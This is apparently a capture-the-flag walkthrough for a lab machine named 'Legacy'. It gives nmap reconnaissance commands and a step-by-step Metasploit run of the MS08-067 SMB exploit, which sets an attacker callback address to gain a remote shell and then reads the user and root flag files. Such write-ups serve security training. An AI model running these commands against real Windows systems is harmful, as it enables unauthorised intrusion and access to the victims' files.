Legacy

As usual let's start with nmap:

nmap -sV -sC 10.129.1.111

We are told to use -Pn so let's try that

nmap -Pn -sC 10.129.1.111

Port 445 is open which is SMB so let's check it with:

smbclient -L 10.129.1.111

It doesn't seem to be working so let's move on. Let's use nmap again but this time looking for any vulnerabilities on port 445

nmap -Pn -p 445 --script vuln 10.129.1.111

Let's see if metasploit got an exploit available for ms08-067

msfconsole

Now let's type:

search ms08-067

There is 1 exploit so let's use this one

use exploit/windows/smb/ms08_067_netapi

show options

Looks like we only need to set up LHOST and RHOSTS as LPORT and RPORT are already setup to the default.

set LHOST 10.10.14.10

This is the IP of the attacker so your IP. If you don't know IP, open a new command prompt and type ifconfig

set RHOSTS 10.129.1.111

This is the IP of the remote host, so the target machine

Type:

exploit

Now we are in!

Type:

cd "Documents and Settings"

ls

cd john

cd Desktop

ls

cat user.txt

Congratulations! You got the user flag!

Now let's go get the root flag. Type:

cd "Documents and Settings"

cd Administrator

ls

cat root.txt

Congratulations! You got the root flag!